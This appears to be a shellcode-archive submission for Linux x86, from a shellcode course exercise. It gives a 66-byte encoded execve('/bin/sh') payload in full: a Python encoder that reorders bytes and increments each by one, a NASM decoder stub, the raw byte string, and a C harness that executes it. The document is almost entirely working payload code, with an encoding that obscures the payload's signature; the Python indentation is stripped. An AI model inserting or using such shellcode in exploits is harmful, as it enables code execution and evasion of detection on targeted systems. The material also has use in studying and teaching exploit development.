# Title: Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
# Author: Jonathan So
# Date: 15/06/2019
# Purpose: decode and spawn a /bin/sh shell
# Tested On: Linux kali 4.19.0-kali4-686 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) i686 GNU/Linux
# Arch: x86
# Size: 66 bytes
# Write-up Link: https://xmilkpowderx.github.io/2019-06-15-SLAEEX4/
======================================================Python Encoder======================================================
#!/usr/bin/python
#execve(/bin/sh)
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encodedP2 = ""
encoded2 = ""
encoded2P2 = ""
count = 1
print 'Encoded shellcode ...'
#Rearrange the position of shellcode and increase each of them by 1
for x in bytearray(shellcode) :
x += 1
if count % 2 != 0:
encoded += '\\x'
encoded += '%02x' % x
else:
encodedP2 += '\\x'
encodedP2 += '%02x' % x
if count % 2 != 0:
encoded2 += '0x'
encoded2 += '%02x,' % x
else:
encoded2P2 += '0x'
encoded2P2 += '%02x,' % x
count += 1
print encoded + encodedP2
print encoded2 + encoded2P2
print 'Len: %d' % len(bytearray(shellcode))
print 'Replace number to: %d' % (count/2)
======================================================Encoded Shellcode======================================================
Original: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Encoded: \x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce
========================================================Decoder.nasm=========================================================
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi
lea edi, [esi + 13] ;half of encoded shellcode len = 25/2 = 13
xor ebx, ebx
xor ecx, ecx
mul ecx
mov edx, esp
mov cl, 13
decode: ;Rearrange the value of shellcode
mov bl, byte[esi] ;get value from esi
dec ebx ;decrease by 1
mov byte[edx + eax], bl
inc eax
mov bl, byte[edi] ;get value from edi
dec ebx ;decrease by 1
mov byte[edx + eax], bl
inc eax
inc esi
inc edi
loop decode
jmp edx
call_shellcode:
call decoder
EncodedShellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
======================================================objdump Generated Shellcode======================================================
\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c
\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69
\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce
============================================================Proof of Concept============================================================
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce";
int main(){
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}